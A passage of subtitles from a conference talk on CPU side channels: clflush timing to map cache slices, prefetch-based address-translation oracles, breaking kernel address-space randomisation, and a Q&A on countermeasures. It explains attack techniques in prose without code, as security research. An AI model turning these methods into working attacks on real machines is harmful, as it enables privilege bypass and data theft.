is undocumented by Intel. Wouldn't be fun
328
00:30:32,460 --> 00:30:39,250
otherwise. So we have this: As many slices
as core, an undocumented hash function
329
00:30:39,250 --> 00:30:43,980
that maps a physical address to a slice,
and while it's actually a bit of a pain
330
00:30:43,980 --> 00:30:48,710
for attacks, it has, it was not designed
for security originally but for
331
00:30:48,710 --> 00:30:53,570
performance, because you want all the
access to be evenly distributed in the
332
00:30:53,570 --> 00:31:00,399
different slices, for performance reasons.
So the hash function basically does, it
333
00:31:00,399 --> 00:31:05,279
takes some bits of the physical address
and output k bits of slice, so just one
334
00:31:05,279 --> 00:31:09,309
bits if you have a two-core machine, two
bits if you have a four-core machine and
335
00:31:09,309 --> 00:31:16,830
so on. Now let's go back to clflush, see
what's the relation with that.
336
00:31:16,830 --> 00:31:21,169
So the thing that we noticed is that
clflush is actually faster to reach a line
337
00:31:21,169 --> 00:31:28,549
on the local slice.
So if you have, if you're flushing always
338
00:31:28,549 --> 00:31:33,340
one line and you run your program on core
zero, core one, core two and core three,
339
00:31:33,340 --> 00:31:37,899
you will observe that one core in
particular on, when you run the program on
340
00:31:37,899 --> 00:31:44,632
one core, the clflush is faster. And so
here this is on core one, and you can see
341
00:31:44,632 --> 00:31:51,139
that core zero, two, and three it's, it's
a bit slower and here we can deduce that,
342
00:31:51,139 --> 00:31:55,320
so we run the program on core one and we
flush always the same line and we can
343
00:31:55,320 --> 00:32:01,850
deduce that the line belong to slice one.
And what we can do with that is that we
344
00:32:01,850 --> 00:32:06,500
can map physical address to slices.
And that's one way to reverse-engineer
345
00:32:06,500 --> 00:32:10,639
this addressing function that was not
documented.
346
00:32:10,639 --> 00:32:15,880
Funnily enough that's not the only way:
What I did before that was using the
347
00:32:15,880 --> 00:32:21,229
performance counters to reverse-engineer
this function, but that's actually a whole
348
00:32:21,229 --> 00:32:27,770
other story and if you want more detail on
that, there's also an article on that.
349
00:32:27,770 --> 00:32:30,139
ML: So the next instruction we want to
350
00:32:30,139 --> 00:32:35,110
talk about is the prefetch instruction.
And the prefetch instruction is used to
351
00:32:35,110 --> 00:32:40,841
tell the CPU: "Okay, please load the data
I need later on, into the cache, if you
352
00:32:40,841 --> 00:32:45,968
have some time." And in the end there are
actually six different prefetch
353
00:32:45,968 --> 00:32:52,929
instructions: prefetcht0 to t2 which
means: "CPU, please load the data into the
354
00:32:52,929 --> 00:32:58,640
first-level cache", or in the last-level
cache, whatever you want to use, but we
355
00:32:58,640 --> 00:33:02,250
spare you the details because it's not so
interesting in the end.
356
00:33:02,250 --> 00:33:06,940
However, what's more interesting is when
we take a look at the Intel manual and
357
00:33:06,940 --> 00:33:11,880
what it says there. So, "Using the
PREFETCH instruction is recommended only
358
00:33:11,880 --> 00:33:17,049
if data does not fit in the cache." So you
can tell the CPU: "Please load data I want
359
00:33:17,049 --> 00:33:23,210
to stream into the cache, so it's more
performant." "Use of software prefetch
360
00:33:23,210 --> 00:33:27,740
should be limited to memory addresses that
are managed or owned within the
361
00:33:27,740 --> 00:33:33,620
application context."
So one might wonder what happens if this
362
00:33:33,620 --> 00:33:40,940
address is not managed by myself. Sounds
interesting. "Prefetching to addresses
363
00:33:40,940 --> 00:33:46,289
that are not mapped to physical pages can
experience non-deterministic performance
364
00:33:46,289 --> 00:33:52,030
penalty. For example specifying a NULL
pointer as an address for prefetch can
365
00:33:52,030 --> 00:33:56,000
cause long delays."
So we don't want to do that because our
366
00:33:56,000 --> 00:34:02,919
program will be slow. So, let's take a
look what they mean with non-deterministic
367
00:34:02,919 --> 00:34:08,889
performance penalty, because we want to
write good software, right? But before
368
00:34:08,889 --> 00:34:12,510
that, we have to take a look at a little
bit more background information to
369
00:34:12,510 --> 00:34:17,710
understand the attacks.
So on modern operating systems, every
370
00:34:17,710 --> 00:34:22,850
application has its own virtual address
space. So at some point, the CPU needs to
371
00:34:22,850 --> 00:34:27,479
translate these addresses to the physical
addresses actually in the DRAM. And for
372
00:34:27,479 --> 00:34:33,690
that we have this very complex-looking
data structure. So we have a 48-bit
373
00:34:33,690 --> 00:34:40,409
virtual address, and some of those bits
mapped to a table, like the PM level 4
374
00:34:40,409 --> 00:34:47,760
table, with 512 entries, so depending on
those bits the CPU knows, at which line he
375
00:34:47,760 --> 00:34:51,520
has to look.
And if there is data there, because the
376
00:34:51,520 --> 00:34:56,900
address is mapped, he can proceed and look
at the page directory, point the table,
377
00:34:56,900 --> 00:35:04,620
and so on for the town. So is everything,
is the same for each level until you come
378
00:35:04,620 --> 00:35:09,130
to your page table, where you have
4-kilobyte pages. So it's in the end not
379
00:35:09,130 --> 00:35:13,851
that complicated, but it's a bit
confusing, because you want to know a
380
00:35:13,851 --> 00:35:20,310
physical address, so you have to look it
up somewhere in the, in the main memory
381
00:35:20,310 --> 00:35:25,420
with physical addresses to translate your
virtual addresses. And if you have to go
382
00:35:25,420 --> 00:35:31,890
through all those levels, it needs a long
time, so we can do better than that and
383
00:35:31,890 --> 00:35:39,160
that's why Intel introduced additional
caches, also for all of those levels. So,
384
00:35:39,160 --> 00:35:45,560
if you want to translate an address, you
take a look at the ITLB for instructions,
385
00:35:45,560 --> 00:35:51,150
and the data TLB for data. If it's there,
you can stop, otherwise you go down all
386
00:35:51,150 --> 00:35:58,700
those levels and if it's not in any cache
you have to look it up in the DRAM. In
387
00:35:58,700 --> 00:36:03,300
addition, the address space you have is
shared, because you have, on the one hand,
388
00:36:03,300 --> 00:36:07,470
the user memory and, on the other hand,
you have mapped the kernel for convenience
389
00:36:07,470 --> 00:36:12,870
and performance also in the address space.
And if your user program wants to access
390
00:36:12,870 --> 00:36:18,310
some kernel functionality like reading a
file, it will switch to the kernel memory
391
00:36:18,310 --> 00:36:23,880
there's a privilege escalation, and then
you can read the file, and so on. So,
392
00:36:23,880 --> 00:36:30,420
that's it. However, you have drivers in
the kernel, and if you know the addresses
393
00:36:30,420 --> 00:36:35,771
of those drivers, you can do code-reuse
attacks, and as a countermeasure, they
394
00:36:35,771 --> 00:36:40,150
introduced address-space layout
randomization, also for the kernel.
395
00:36:40,150 --> 00:36:47,040
And this means that when you have your
program running, the kernel is mapped at
396
00:36:47,040 --> 00:36:51,630
one address and if you reboot the machine
it's not on the same address anymore but
397
00:36:51,630 --> 00:36:58,390
somewhere else. So if there is a way to
find out at which address the kernel is
398
00:36:58,390 --> 00:37:04,450
loaded, you have circumvented this
countermeasure and defeated kernel address
399
00:37:04,450 --> 00:37:11,060
space layout randomization. So this would
be nice for some attacks. In addition,
400
00:37:11,060 --> 00:37:16,947
there's also the kernel direct physical
map. And what does this mean? It's
401
00:37:16,947 --> 00:37:23,320
implemented on many operating systems like
OS X, Linux, also on the Xen hypervisor
402
00:37:23,320 --> 00:37:27,860
and
BSD, but not on Windows. But what it means
403
00:37:27,860 --> 00:37:33,870
is that the complete physical memory is
mapped in additionally in the kernel
404
00:37:33,870 --> 00:37:40,460
memory at a fixed offset. So, for every
page that is mapped in the user space,
405
00:37:40,460 --> 00:37:45,160
there's something like a twin page in the
kernel memory, which you can't access
406
00:37:45,160 --> 00:37:50,371
because it's in the kernel memory.
However, we will need it later, because
407
00:37:50,371 --> 00:37:58,230
now we go back to prefetch and see what we
can do with that. So, prefetch is not a
408
00:37:58,230 --> 00:38:04,150
usual instruction, because it just tells
the CPU "I might need that data later on.
409
00:38:04,150 --> 00:38:10,000
If you have time, load for me," if not,
the CPU can ignore it because it's busy
410
00:38:10,000 --> 00:38:15,810
with other stuff. So, there's no necessity
that this instruction is really executed,
411
00:38:15,810 --> 00:38:22,070
but most of the time it is. And a nice,
interesting thing is that it generates no
412
00:38:22,070 --> 00:38:29,000
faults, so whatever you pass to this
instruction, your program won't crash, and
413
00:38:29,000 --> 00:38:33,990
it does not check any privileges, so I can
also pass an kernel address to it and it
414
00:38:33,990 --> 00:38:37,510
won't say "No, stop, you accessed an
address that you are not allowed to
415
00:38:37,510 --> 00:38:45,530
access, so I crash," it just continues,
which is nice.
416
00:38:45,530 --> 00:38:49,810
The second interesting thing is that the
operand is a virtual address, so every
417
00:38:49,810 --> 00:38:55,534
time you execute this instruction, the CPU
has to go and check "OK, what physical
418
00:38:55,534 --> 00:38:59,600
address does this virtual address
correspond to?" So it has to do the lookup
419
00:38:59,600 --> 00:39:05,750
with all those tables we've seen earlier,
and as you probably have guessed already,
420
00:39:05,750 --> 00:39:10,370
the execution time varies also for the
prefetch instruction and we will see later
421
00:39:10,370 --> 00:39:16,090
on what we can do with that.
So, let's get back to the direct physical
422
00:39:16,090 --> 00:39:22,870
map. Because we can create an oracle for
address translation, so we can find out
423
00:39:22,870 --> 00:39:27,540
what physical address belongs to the
virtual address. Because nowadays you
424
00:39:27,540 --> 00:39:31,990
don't want that the user to know, because
you can craft nice rowhammer attacks with
425
00:39:31,990 --> 00:39:37,520
that information, and more advanced cache
attacks, so you restrict this information
426
00:39:37,520 --> 00:39:44,270
to the user. But let's check if we find a
way to still get this information. So, as
427
00:39:44,270 --> 00:39:50,150
I've told you earlier, if you have a
paired page in the user space map,
428
00:39:50,150 --> 00:39:54,505
you have the twin page in the kernel
space, and if it's cached,
429
00:39:54,505 --> 00:39:56,710
its cached for both of them again.
430
00:39:56,710 --> 00:40:03,170
So, the attack now works as the following:
From the attacker you flush your user
431
00:40:03,170 --> 00:40:09,760
space page, so it's not in the cache for
the... also for the kernel memory, and
432
00:40:09,760 --> 00:40:15,850
then you call prefetch on the address of
the kernel, because as I told you, you
433
00:40:15,850 --> 00:40:22,050
still can do that because it doesn't
create any faults. So, you tell the CPU
434
00:40:22,050 --> 00:40:28,310
"Please load me this data into the cache
even if I don't have access to this data
435
00:40:28,310 --> 00:40:32,550
normally."
And if we now measure on our user space
436
00:40:32,550 --> 00:40:37,100
page the address again, and we measure a
cache hit, because it has been loaded by
437
00:40:37,100 --> 00:40:42,630
the CPU into the cache, we know exactly at
which position, since we passed the
438
00:40:42,630 --> 00:40:48,250
address to the function, this address
corresponds to. And because this is at a
439
00:40:48,250 --> 00:40:53,280
fixed offset, we can just do a simple
subtraction and know the physical address
440
00:40:53,280 --> 00:40:59,180
again. So we have a nice way to find
physical addresses for virtual addresses.
441
00:40:59,180 --> 00:41:04,390
And in practice this looks like this
following plot. So, it's pretty simple,
442
00:41:04,390 --> 00:41:08,910
because we just do this for every address,
and at some point we measure a cache hit.
443
00:41:08,910 --> 00:41:14,260
So, there's a huge difference. And exactly
at this point we know this physical
444
00:41:14,260 --> 00:41:20,140
address corresponds to our virtual
address. The second thing is that we can
445
00:41:20,140 --> 00:41:27,070
exploit the timing differences it needs
for the prefetch instruction. Because, as
446
00:41:27,070 --> 00:41:31,850
I told you, when you go down this cache
levels, at some point you see "it's here"
447
00:41:31,850 --> 00:41:37,500
or "it's not here," so it can abort early.
And with that we can know exactly
448
00:41:37,500 --> 00:41:41,800
when the prefetch
instruction aborted, and know how the
449
00:41:41,800 --> 00:41:48,070
pages are mapped into the address space.
So, the timing depends on where the
450
00:41:48,070 --> 00:41:57,090
translation stops. And using those two
properties and those information, we can
451
00:41:57,090 --> 00:42:02,227
do the following: On the one hand, we can
build variants of cache attacks. So,
452
00:42:02,227 --> 00:42:07,444
instead of Flush+Reload, we can do
Flush+Prefetch, for instance. We can
453
00:42:07,444 --> 00:42:12,060
also use prefetch to mount rowhammer
attacks on privileged addresses, because
454
00:42:12,060 --> 00:42:18,069
it doesn't do any faults when we pass
those addresses, and it works as well. In
455
00:42:18,069 --> 00:42:23,330
addition, we can use it to recover the
translation levels of a process, which you
456
00:42:23,330 --> 00:42:27,870
could do earlier with the page map file,
but as I told you it's now privileged, so
457
00:42:27,870 --> 00:42:32,890
you don't have access to that, and by
doing that you can bypass address space
458
00:42:32,890 --> 00:42:38,170
layout randomization. In addition, as I
told you, you can translate virtual
459
00:42:38,170 --> 00:42:43,530
addresses to physical addresses, which is
now also privileged with the page map
460
00:42:43,530 --> 00:42:48,790
file, and using that it reenables return
to direct exploits, which have been
461
00:42:48,790 --> 00:42:55,550
demonstrated last year. On top of that, we
can also use this to locate kernel
462
00:42:55,550 --> 00:43:00,850
drivers, as I told you. It would be nice
if we can circumvent KSLR as well, and I
463
00:43:00,850 --> 00:43:08,380
will show you now how this is possible.
So, with the first oracle we find out all
464
00:43:08,380 --> 00:43:15,430
the pages that are mapped, and for each of
those pages, we evict the translation
465
00:43:15,430 --> 00:43:18,210
caches, and we can do that by either
calling sleep,
466
00:43:18,210 --> 00:43:24,450
which schedules another program, or access
just a large memory buffer. Then, we
467
00:43:24,450 --> 00:43:28,260
perform a syscall to the driver. So,
there's code of the driver executed and
468
00:43:28,260 --> 00:43:33,540
loaded into the cache, and then we just
measure the time prefetch takes on this
469
00:43:33,540 --> 00:43:40,840
address. And in the end, the fastest
average access time is the driver page.
470
00:43:40,840 --> 00:43:46,770
So, we can mount this attack on Windows 10
in less than 12 seconds. So, we can defeat
471
00:43:46,770 --> 00:43:52,110
KSLR in less than 12 seconds, which is
very nice. And in practice, the
472
00:43:52,110 --> 00:43:58,330
measurements looks like the following: So,
we have a lot of long measurements, and at
473
00:43:58,330 --> 00:44:05,060
some point you have a low one, and you
know exactly that this driver region and
474
00:44:05,060 --> 00:44:09,930
the address the driver is located. And
you can mount those read to direct
475
00:44:09,930 --> 00:44:16,210
attacks again. However, that's not
everything, because there are more
476
00:44:16,210 --> 00:44:20,795
instructions in Intel.
CM: Yeah, so, the following is not our
477
00:44:20,795 --> 00:44:24,350
work, but we thought that would be
interesting, because it's basically more
478
00:44:24,350 --> 00:44:30,740
instructions, more attacks, more fun. So
there's the RDSEED instruction, and what
479
00:44:30,740 --> 00:44:35,340
it does, that is request a random seed to
the hardware random number generator. So,
480
00:44:35,340 --> 00:44:39,310
the thing is that there is a fixed number
of precomputed random bits, and that takes
481
00:44:39,310 --> 00:44:44,320
time to regenerate them. So, as everything
that takes time, you can create a covert
482
00:44:44,320 --> 00:44:50,180
channel with that. There is also FADD and
FMUL, which are floating point operations.
483
00:44:50,180 --> 00:44:56,740
Here, the running time of this instruction
depends on the operands. Some people
484
00:44:56,740 --> 00:45:01,530
managed to bypass Firefox's same origin
policy with an SVG filter timing attack
485
00:45:01,530 --> 00:45:08,540
with that. There's also the JMP
instructions. So, in modern CPUs you have
486
00:45:08,540 --> 00:45:14,520
branch prediction, and branch target
prediction. With that, it's actually been
487
00:45:14,520 --> 00:45:18,250
studied a lot, you can create a covert
channel. You can do side-channel attacks
488
00:45:18,250 --> 00:45:26,028
on crypto. You can also bypass KSLR, and
finally, there are TSX instructions, which
489
00:45:26,028 --> 00:45:31,010
is an extension for hardware transactional
memory support, which has also been used
490
00:45:31,010 --> 00:45:37,150
to bypass KSLR. So, in case you're not
sure, KSLR is dead. You have lots of
491
00:45:37,150 --> 00:45:45,650
different things to read. Okay, so, on the
conclusion now. So, as you've seen, it's
492
00:45:45,650 --> 00:45:50,190
actually more a problem of CPU design,
than really the instruction sets
493
00:45:50,190 --> 00:45:55,720
architecture. The thing is that all these
issues are really hard to patch. They
494
00:45:55,720 --> 00:45:59,966
are all linked to performance
optimizations, and we are not getting rid
495
00:45:59,966 --> 00:46:03,890
of performance optimization. That's
basically a trade-off between performance
496
00:46:03,890 --> 00:46:11,530
and security, and performance seems to
always win. There has been some
497
00:46:11,530 --> 00:46:20,922
propositions to... against cache attacks,
to... let's say remove the CLFLUSH
498
00:46:20,922 --> 00:46:26,640
instructions. The thing is that all these
quick fix won't work, because we always
499
00:46:26,640 --> 00:46:31,450
find new ways to do the same thing without
these precise instructions and also, we
500
00:46:31,450 --> 00:46:37,410
keep finding new instruction that leak
information. So, it's really, let's say
501
00:46:37,410 --> 00:46:43,740
quite a big topic that we have to fix
this. So, thank you very much for your
502
00:46:43,740 --> 00:46:47,046
attention. If you have any questions we'd
be happy to answer them.
503
00:46:47,046 --> 00:46:52,728
applause
504
00:46:52,728 --> 00:47:01,510
applause
Herald: Okay. Thank you very much again
505
00:47:01,510 --> 00:47:06,571
for your talk, and now we will have a Q&A,
and we have, I think, about 15 minutes, so
506
00:47:06,571 --> 00:47:11,330
you can start lining up behind the
microphones. They are in the gangways in
507
00:47:11,330 --> 00:47:18,130
the middle. Except, I think that one...
oh, no, it's back up, so it will work. And
508
00:47:18,130 --> 00:47:22,180
while we wait, I think we will take
questions from our signal angel, if there
509
00:47:22,180 --> 00:47:28,810
are any. Okay, there aren't any, so...
microphone questions. I think, you in
510
00:47:28,810 --> 00:47:33,440
front.
Microphone: Hi. Can you hear me?
511
00:47:33,440 --> 00:47:40,050
Herald: Try again.
Microphone: Okay. Can you hear me now?
512
00:47:40,050 --> 00:47:46,480
Okay. Yeah, I'd like to know what exactly
was your stealthiness metric? Was it that
513
00:47:46,480 --> 00:47:51,310
you can't distinguish it from a normal
process, or...?
514
00:47:51,310 --> 00:47:56,500
CM: So...
Herald: Wait a second. We have still Q&A,
515
00:47:56,500 --> 00:47:59,780
so could you quiet down a bit? That would
be nice.
516
00:47:59,780 --> 00:48:08,180
CM: So, the question was about the
stealthiness metric. Basically, we use the
517
00:48:08,180 --> 00:48:14,320
metric with cache misses and cache
references, normalized by the instructions
518
00:48:14,320 --> 00:48:21,080
TLB events, and we
just found the threshold under which
519
00:48:21,080 --> 00:48:25,820
pretty much every benign application was
below this, and rowhammer and cache
520
00:48:25,820 --> 00:48:30,520
attacks were after that. So we fixed the
threshold, basically.
521
00:48:30,520 --> 00:48:35,520
H: That microphone.
Microphone: Hello. Thanks for your talk.
522
00:48:35,520 --> 00:48:42,760
It was great. First question: Did you
inform Intel before doing this talk?
523
00:48:42,760 --> 00:48:47,520
CM: Nope.
Microphone: Okay. The second question:
524
00:48:47,520 --> 00:48:51,050
What's your future plans?
CM: Sorry?
525
00:48:51,050 --> 00:48:55,780
M: What's your future plans?
CM: Ah, future plans. Well, what I did,
526
00:48:55,780 --> 00:49:01,220
that is interesting, is that we keep
finding these more or less by accident, or
527
00:49:01,220 --> 00:49:06,440
manually, so having a good idea of what's
the attack surface here would be a good
528
00:49:06,440 --> 00:49:10,050
thing, and doing that automatically would
be even better.
529
00:49:10,050 --> 00:49:14,170
M: Great, thanks.
H: Okay, the microphone in the back,
530
00:49:14,170 --> 00:49:18,770
over there. The guy in white.
M: Hi. One question. If you have,
531
00:49:18,770 --> 00:49:24,410
like, a demon, that randomly invalidates
some cache lines, would that be a better
532
00:49:24,410 --> 00:49:31,120
countermeasure than disabling the caches?
ML: What was the question?
533
00:49:31,120 --> 00:49:39,580
CM: If invalidating cache lines would be
better than disabling the whole cache. So,
534
00:49:39,580 --> 00:49:42,680
I'm...
ML: If you know which cache lines have
535
00:49:42,680 --> 00:49:47,300
been accessed by the process, you can
invalidate those cache lines before you
536
00:49:47,300 --> 00:49:52,820
swap those processes, but it's also a
trade-off between performance. Like, you
537
00:49:52,820 --> 00:49:57,940
can also, if you switch processes, flush
the whole cache, and then it's empty, and
538
00:49:57,940 --> 00:50:01,900
then you don't see any activity anymore,
but there's also the trade-off of
539
00:50:01,900 --> 00:50:07,510
performance with this.
M: Okay, maybe a second question. If you,
540
00:50:07,510 --> 00:50:12,240
there are some ARM architectures
that have random cache line invalidations.
541
00:50:12,240 --> 00:50:16,010
Did you try those, if you can see a
[unintelligible] channel there.
542
00:50:16,010 --> 00:50:21,960
ML: If they're truly random, but probably
you just have to make more measurements
543
00:50:21,960 --> 00:50:27,180
and more measurements, and then you can
average out the noise, and then you can do
544
00:50:27,180 --> 00:50:30,350
these attacks again. It's like, with prime
and probe, where you need more
545
00:50:30,350 --> 00:50:34,080
measurements, because it's much more
noisy, so in the end you will just need
546
00:50:34,080 --> 00:50:37,870
much more measurements.
CM: So, on ARM, it's supposed to be pretty
547
00:50:37,870 --> 00:50:43,260
random. At least it's in the manual, but
we actually found nice ways to evict cache
548
00:50:43,260 --> 00:50:47,230
lines, that we really wanted to evict, so
it's not actually that pseudo-random.
549
00:50:47,230 --> 00:50:51,960
So, even... let's say, if something is
truly random, it might be nice, but then
550
00:50:51,960 --> 00:50:57,170
it's also quite complicated to implement.
I mean, you probably don't want a random
551
00:50:57,170 --> 00:51:01,480
number generator just for the cache.
M: Okay. Thanks.
552
00:51:01,480 --> 00:51:05,980
H: Okay, and then the three guys here on
the microphone in the front.
553
00:51:05,980 --> 00:51:13,450
M: My question is about a detail with the
keylogger. You could distinguish between
554
00:51:13,450 --> 00:51:18,150
space, backspace and alphabet, which is
quite interesting. But could you also
555
00:51:18,150 --> 00:51:22,320
figure out the specific keys that were
pressed, and if so, how?
556
00:51:22,320 --> 00:51:25,650
ML: Yeah, that depends on the
implementation of the keyboard. But what
557
00:51:25,650 --> 00:51:29,310
we did, we used the Android stock
keyboard, which is shipped with the
558
00:51:29,310 --> 00:51:34,520
Samsung, so it's pre-installed. And if you
have a table somewhere in your code, which
559
00:51:34,520 --> 00:51:39,540
says "Okay, if you press this exact
location or this image, it's an A or it's
560
00:51:39,540 --> 00:51:44,450
an B", then you can also do a more
sophisticated attack. So, if you find any
561
00:51:44,450 --> 00:51:49,050
functions or data in the code, which
directly tells you "Okay, this is this
562
00:51:49,050 --> 00:51:54,520
character," you can also spy on the actual
key characters on the keyboard.
563
00:51:54,520 --> 00:52:02,900
M: Thank you.
M: Hi. Thank you for your talk. My first
564
00:52:02,900 --> 00:52:08,570
question is: What can we actually do now,
to mitigate this kind of attack? By, for
565
00:52:08,570 --> 00:52:11,980
example switching off TSX or using ECC
RAM.
566
00:52:11,980 --> 00:52:17,410
CM: So, I think the very important thing
to protect would be, like crypto, and the
567
00:52:17,410 --> 00:52:20,840
good thing is that today we know how to
build crypto that is resistant to side-
568
00:52:20,840 --> 00:52:24,490
channel attacks. So the good thing would
be to stop improving implementation that
569
00:52:24,490 --> 00:52:31,360
are known to be vulnerable for 10 years.
Then things like keystrokes is way harder
570
00:52:31,360 --> 00:52:36,830
to protect, so let's say crypto is
manageable; the whole system is clearly
571
00:52:36,830 --> 00:52:41,490
another problem. And you can have
different types of countermeasure on the
572
00:52:41,490 --> 00:52:45,780
hardware side but it does would mean that
Intel an ARM actually want to fix that,
573
00:52:45,780 --> 00:52:48,560
and that they know how to fix that. I
don't even know how to fix that in
574
00:52:48,560 --> 00:52:55,500
hardware. Then on the system side, if you
prevent some kind of memory sharing, you
575
00:52:55,500 --> 00:52:58,540
don't have flush involved anymore
and primum (?) probably is much more
576
00:52:58,540 --> 00:53:04,880
noisier, so it would be an improvement.
M: Thank you.
577
00:53:04,880 --> 00:53:11,880
H: Do we have signal angel questions? No.
OK, then more microphone.
578
00:53:11,880 --> 00:53:16,630
M: Hi, thank you. I wanted to ask about
the way you establish the side-channel
579
00:53:16,630 --> 00:53:23,280
between the two processors, because it
would obviously have to be timed in a way to
580
00:53:23,280 --> 00:53:28,511
transmit information between one process
to the other. Is there anywhere that you
581
00:53:28,511 --> 00:53:32,970
documented the whole? You know, it's
actually almost like the seven layers or
582
00:53:32,970 --> 00:53:36,580
something like that. There are any ways
that you documented that? It would be
583
00:53:36,580 --> 00:53:40,260
really interesting to know how it worked.
ML: You can find this information in the
584
00:53:40,260 --> 00:53:46,120
paper because there are several papers on
covered channels using that, so the NDSS
585
00:53:46,120 --> 00:53:51,300
paper is published in February I guess,
but the Armageddon paper also includes
586
00:53:51,300 --> 00:53:55,670
a cover channel, and you can
find more information about how the
587
00:53:55,670 --> 00:53:59,320
packets look like and how the
synchronization works in the paper.
588
00:53:59,320 --> 00:54:04,020
M: Thank you.
H: One last question?
589
00:54:04,020 --> 00:54:09,750
M: Hi! You mentioned that you used Osvik's
attack for the AES side-channel attack.
590
00:54:09,750 --> 00:54:17,350
Did you solve the AES round detection and
is it different to some scheduler
591
00:54:17,350 --> 00:54:21,441
manipulation?
CM: So on this one I think we only did
592
00:54:21,441 --> 00:54:24,280
some synchronous attack, so we already
knew when
593
00:54:24,280 --> 00:54:27,770
the victim is going to be scheduled and
we didn't have anything to do with
594
00:54:27,770 --> 00:54:32,930
schedulers.
M: Alright, thank you.
595
00:54:32,930 --> 00:54:37,140
H: Are there any more questions? No, I
don't see anyone. Then, thank you very
596
00:54:37,140 --> 00:54:39,132
much again to our speakers.
597
00:54:39,132 --> 00:54:42,162
applause
598
00:54:42,162 --> 00:54:58,970
music
599
00:54:58,970 --> 00:55:06,000
subtitles created by c3subtitles.de
in the year 2020. Join, and help us!